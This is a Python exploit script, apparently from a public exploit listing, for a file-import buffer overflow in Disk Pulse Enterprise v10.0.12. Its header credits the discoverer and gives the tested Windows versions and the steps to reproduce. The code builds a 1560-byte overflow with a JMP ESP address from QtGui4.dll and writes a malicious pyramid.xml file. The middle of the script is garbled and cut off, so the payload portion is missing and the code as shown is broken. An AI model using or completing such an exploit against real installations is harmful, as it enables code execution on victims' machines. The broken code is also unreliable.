#!/usr/bin/python # Exploit Title : Disk Pulse Enterprise v10.0.12 - Buffer Overflow # Discovery by : Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Website : www.pyramidcyber.com # Discovery Date : 25/08/2017 # Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v10.0.12.exe # Tested Version : 10.0.12 # Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64 # Steps to Reproduce: Run the python file to generate pyramid.xml and then open Disk Pulse software , right click and click on import command . Select pyramid.xml file . import os,struct #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('' f = open('pyramid.xml', 'w') f.write(file) f.close()